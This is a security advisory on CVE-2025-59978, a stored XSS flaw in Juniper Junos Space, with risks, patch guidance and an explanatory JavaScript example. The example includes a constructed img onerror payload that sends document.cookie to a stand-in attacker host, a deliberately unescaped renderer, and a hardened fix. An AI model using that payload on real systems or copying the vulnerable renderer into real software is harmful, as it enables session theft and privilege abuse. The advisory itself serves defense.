Warning: Critical stored XSS vulnerability in Juniper Networks Junos Space, Patch Immediately!

Published: 10/10/2025

    * Last update: 10/10/2025
    * Affected software: Juniper Networks Junos Space < 24.1R4
    * Type: Stored cross-site scripting (XSS); the injected script runs in the browser session of any user who views the affected page, including privileged users
    * CVE/CVSS
        → CVE-2025-59978: CVSS 9.4 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/R:U/RE:M)

Sources

Juniper: https://supportportal.juniper.net/s/article/2025-10-Security-Bulletin-Junos-Space-Multiple-XSS-vulnerabilities-resolved-in-24-1R4-release

Risks

A malicious actor with low-privileged access to the Junos Space web interface (the CVSS vector requires PR:L) can store script in a page of the platform. When a privileged user later views that page (UI:P, no action beyond viewing is needed), the script runs in that user's browser session and can perform actions on the platform with the victim's privileges.
This can lead to accounts on the platform being compromised and to unauthorized users performing privileged actions. Malicious actors target platforms such as the Junos Space Network Management platform because they can be used to interact with the other network devices and services the platform manages. If exploited, the impact on the confidentiality, integrity and availability of the device is high.

Description

CVE-2025-59978 is a stored cross-site scripting vulnerability in Juniper Networks Junos Space, one of multiple XSS issues Juniper resolved in release 24.1R4. A low-privileged actor can store script tags directly in a page served by the platform because user-supplied content is not properly neutralized before it is rendered. When another user views that page, the stored script executes in that user's browser with the user's session, so actions on the platform are carried out on the victim's behalf. If the victim is a privileged user, the attacker can effectively act as that user, further compromise accounts on the platform and escalate their privileges.
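The stored XSS pattern described in the Risks and Description sections above, as an added illustration that is not Junos Space code and not taken from the Juniper bulletin. The rendering functions, the "description" field and the attacker host `attacker.invalid` are assumptions made for the example; the stored payload is constructed. The vulnerable renderer interpolates a stored, user-controlled value straight into HTML; the hardened renderer escapes it first, and a small checker shows which of the two outputs still contains live markup.

```javascript
// Added example, not the project's own code. Field name, page structure and
// the attacker host are assumptions made for this illustration.

// Constructed sample: a low-privileged user saved this as a device "description".
// If rendered as markup, the onerror handler runs in the viewer's session.
const STORED_PAYLOAD =
  '<img src=x onerror="location=\'https://attacker.invalid/?c=\'+document.cookie">';

// Vulnerable rendering: the stored value is concatenated directly into HTML,
// so any tag or event handler it contains is parsed and executed by the browser
// of whoever views the page (the privileged user in the advisory's scenario).
function renderDescriptionVulnerable(description) {
  return `<td class="description">${description}</td>`;
}

// Escape the five HTML-significant characters so the stored value is displayed
// as text instead of being parsed as markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened rendering: same output structure, but the user-controlled part is
// escaped before interpolation.
function renderDescriptionSafe(description) {
  return `<td class="description">${escapeHtml(description)}</td>`;
}

// Check usable in a review or test: does the rendered cell contain any tag
// other than the wrapping <td>...</td>? Escaped output never does, because
// every "<" from the stored value has become "&lt;".
function containsActiveMarkup(html) {
  return /<(?!\/?td\b)[a-z]/i.test(html);
}

// Stand-alone demonstration.
console.log('vulnerable:', renderDescriptionVulnerable(STORED_PAYLOAD));
console.log('  active markup?', containsActiveMarkup(renderDescriptionVulnerable(STORED_PAYLOAD)));
console.log('hardened:  ', renderDescriptionSafe(STORED_PAYLOAD));
console.log('  active markup?', containsActiveMarkup(renderDescriptionSafe(STORED_PAYLOAD)));
```

Output encoding at the point of rendering is the fix shown here; a server-side block list on input (rejecting the literal string `<script>`, for instance) would not stop the `<img onerror>` payload above, which is why the check looks at the rendered output rather than at the stored value.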

Recommended Actions

Patch

The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority, after thorough testing. Junos Space 24.1R4 is the release in which Juniper resolved these XSS vulnerabilities.

Monitor/Detect

The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity, ensuring a swift response in case of an intrusion.

In case of an intrusion, you can report an incident via: https://ccb.belgium.be/report-incident.

While patching appliances or software to the newest version may provide safety from future exploitation, it does not remediate historic compromise.

References

NIST.GOV: https://nvd.nist.gov/vuln/detail/CVE-2025-59978